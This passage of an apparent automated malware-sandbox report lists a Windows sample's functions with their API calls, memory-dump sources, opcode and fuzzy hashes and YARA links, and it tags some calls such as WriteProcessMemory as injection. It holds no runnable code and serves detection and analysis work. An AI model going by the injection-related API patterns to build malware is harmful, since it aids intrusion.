                                                                • GetCursorPos.USER32(00000000), ref: 0046426D
                                                                  • Part of subcall function 00464345: GetForegroundWindow.USER32(?,00464250), ref: 0046437A
                                                                  • Part of subcall function 00464345: ClientToScreen.USER32(00000000,00000001), ref: 004643CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClientCursorForegroundScreenWindow
                                                                • String ID:
                                                                • API String ID: 3982838974-0
                                                                • Opcode ID: d9ca2dd8ef537604625153b146f5d3752cb894a9baad6b76fc1f382740ff85b5
                                                                • Instruction ID: 6c5561459313cfab8a67fcd032739c1c6d9c0a15a8597213b65b7d9c58ef2b74
                                                                • Opcode Fuzzy Hash: d9ca2dd8ef537604625153b146f5d3752cb894a9baad6b76fc1f382740ff85b5
                                                                • Instruction Fuzzy Hash: 7541EBB5D00208EBDF40EFA5D8C5BADBBB0FF0C304F1080A9D5597A246D7755A64CB66
                                                                Function 004B6134 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 814b53bad2891968ca2a62605e51bd2526c8143a8f440eabf574c001446bda79
                                                                • Instruction ID: c26dde67f9451de340a57ef4328caa0910851afca8f8aa2cbd7d09684aa2f955
                                                                • Opcode Fuzzy Hash: 814b53bad2891968ca2a62605e51bd2526c8143a8f440eabf574c001446bda79
                                                                • Instruction Fuzzy Hash: 6441C030C0450CEBEF01AF91E845BEEBF31EF48705F1180AAE550391A5CB7A0A75AB69
                                                                Function 004B880D Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,00000006,00000000), ref: 004B894C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: f948a4f9bd7eab0b0be446ca242f6e50f93b9077d55d4c7e05c460d2c9b9df3a
                                                                • Instruction ID: 10a5411efdf516e1d54c1c1f3a2b5a596e63d978402e41d807d0ba7acaee4491
                                                                • Opcode Fuzzy Hash: f948a4f9bd7eab0b0be446ca242f6e50f93b9077d55d4c7e05c460d2c9b9df3a
                                                                • Instruction Fuzzy Hash: 634173B1D00208EBEF00AF91D846BEEBB71EF14315F50802AF9047A291D7795E55CB65
                                                                Function 0043C6C7 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • StrToIntExA.SHLWAPI(?,00000001,00000000), ref: 0043C747
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1801431ed1471038946ceae503e42c9e7db3f17625129ac0aeb01a98fbf4d861
                                                                • Instruction ID: 7c82150a22ecb1966c2a1799c033551f36b6e23ce824140ea61281186bba03ac
                                                                • Opcode Fuzzy Hash: 1801431ed1471038946ceae503e42c9e7db3f17625129ac0aeb01a98fbf4d861
                                                                • Instruction Fuzzy Hash: 483178B1E0030ABBEB00EFA19CC5FBF7778EB08304F10447EAA04B6282E7795A144B55
                                                                Function 004B64B7 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 010b8899327d02603b7fc267cac4e5b97729de5c497a1888bac3f14be82272f7
                                                                • Instruction ID: 5c79acf4356ce2ac4ec0f0b527197483198b7a1c515f74638b0e85d2f484a2df
                                                                • Opcode Fuzzy Hash: 010b8899327d02603b7fc267cac4e5b97729de5c497a1888bac3f14be82272f7
                                                                • Instruction Fuzzy Hash: B041CE70C0461CEBEF00AF91E84ABEDBF30FB48714F52509AE18035195CB7A4AB5DB59
                                                                Function 004A8DD6 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageA.USER32(?,?,?,?), ref: 004A8E48
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 7cf1bb33b07c6135e5230db07470b743291789b9f5a67753a750df357404ecd2
                                                                • Instruction ID: 2f8709da3d407c77e0b0e79f1f2b659f59b39391966fb060892a15c98058282c
                                                                • Opcode Fuzzy Hash: 7cf1bb33b07c6135e5230db07470b743291789b9f5a67753a750df357404ecd2
                                                                • Instruction Fuzzy Hash: 70210B75E00208FFDB40DFA8D985B9EBBB5FB1D300F140069E608E7251D7359A60DB56
                                                                Function 00454027 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowTextA.USER32(00000000,00000000,000000FF), ref: 0045407E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TextWindow
                                                                • String ID:
                                                                • API String ID: 530164218-0
                                                                • Opcode ID: c7c971cc49ee7c320bc15f877aaac2b9d96152cbd3bd7ff3bbdbfddd0c860f8b
                                                                • Instruction ID: 8c034cc1d3d227e54b838da7e6a3f6fe8d28a7561d9c98345994667f28a27d2b
                                                                • Opcode Fuzzy Hash: c7c971cc49ee7c320bc15f877aaac2b9d96152cbd3bd7ff3bbdbfddd0c860f8b
                                                                • Instruction Fuzzy Hash: F911CA71F00305BBEB60EFA59C86B6E76B89B04714F20006EBA04BB2C2E9759E549759
                                                                Function 004540DD Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClassNameA.USER32(00000000,00000000,000000FF), ref: 00454134
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassName
                                                                • String ID:
                                                                • API String ID: 1191326365-0
                                                                • Opcode ID: c7de5c44d5e07430e4216ec36754341827ff67021eabdf98d771b6d6315ec4f5
                                                                • Instruction ID: 3ff09627a9323dcdf74e35c1d60f9bda83b8ce4d289816c831cf0758ba0b40e1
                                                                • Opcode Fuzzy Hash: c7de5c44d5e07430e4216ec36754341827ff67021eabdf98d771b6d6315ec4f5
                                                                • Instruction Fuzzy Hash: 91110A71F00305BBEB60EFA48C8AF6E76BC9B18314F10006EB904BB283DA754E949759
                                                                Function 00450DD1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTempPathA.KERNEL32(000000FF,00000000), ref: 00450E25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PathTemp
                                                                • String ID:
                                                                • API String ID: 2920410445-0
                                                                • Opcode ID: af3aa722925591cff200d541868dfb28ba4ac04f5d5cd6148ed3ac13454cd072
                                                                • Instruction ID: e24397560946db6b8198f02c20047b2a48e357cafc7c2d87ea6ef565ac905fba
                                                                • Opcode Fuzzy Hash: af3aa722925591cff200d541868dfb28ba4ac04f5d5cd6148ed3ac13454cd072
                                                                • Instruction Fuzzy Hash: 3B11A774F40304BBE760EE949C83F6E76B89B04704F20446DFA08B6283D5755A548759
                                                                Function 004B02C7 Relevance: 1.6, APIs: 1, Instructions: 60injectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 004B0347
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 50abeafaa1a5c397077bf6a3b6553cdce84a9ef0a8c71331850d4ea531b1c9df
                                                                • Instruction ID: a9eeb14bb7cb9b03773850dba93674fdde55d89127fb21b7c01fd8f2ff19e540
                                                                • Opcode Fuzzy Hash: 50abeafaa1a5c397077bf6a3b6553cdce84a9ef0a8c71331850d4ea531b1c9df
                                                                • Instruction Fuzzy Hash: 67112B74E04209EBEB109E54D949BEF77B4EB04306F10506AED05AB381E3799A50DBA6
                                                                Function 004C2909 Relevance: 1.6, APIs: 1, Instructions: 309COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55cc402581052bb7c4779ee50c8daca9add5a0d1fcd813a09728df581dc69c8f
                                                                • Instruction ID: f4ca3fe5052cdacaafb3009c0895c12a7bd6a0b3cdbd7b59d31924fb5c954347
                                                                • Opcode Fuzzy Hash: 55cc402581052bb7c4779ee50c8daca9add5a0d1fcd813a09728df581dc69c8f
                                                                • Instruction Fuzzy Hash: 8BB181B5D00208AFEF50DFA1D986FEE7BB4EB18314F10402EF105B6291D7B95E509B69
                                                                Function 004B4D5C Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B4DF1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 760666b61dc545d3abaa7938f7ba8eafbc2b7c23c1254eb9634a771b6cb11529
                                                                • Instruction ID: 6c80bb89c1b8a289e9314c8f2cf3ccc973041d69980c27a0845a96177901a86e
                                                                • Opcode Fuzzy Hash: 760666b61dc545d3abaa7938f7ba8eafbc2b7c23c1254eb9634a771b6cb11529
                                                                • Instruction Fuzzy Hash: 2A116D30C0460CE7DB00AF91F94A7FEBB38FB84310F218496E49035196CB798A34D76A
                                                                Function 004400B3 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000100), ref: 00440107
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DirectoryWindows
                                                                • String ID:
                                                                • API String ID: 3619848164-0
                                                                • Opcode ID: a82611d599d8f2d42e39b968d883b12096aa04c234ff81e4f98ee2eba4e0e3a7
                                                                • Instruction ID: 491acbb18282efbecbcb31fea4d6bc26d52704b3c4182a0ce19d1dd6fd28d020
                                                                • Opcode Fuzzy Hash: a82611d599d8f2d42e39b968d883b12096aa04c234ff81e4f98ee2eba4e0e3a7
                                                                • Instruction Fuzzy Hash: 9F01CC71E40304BBEB50DF949D83F9DB778DB05300F10006DF60876282D67A5B508755
                                                                Function 004BC00A Relevance: 1.6, APIs: 1, Instructions: 303COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
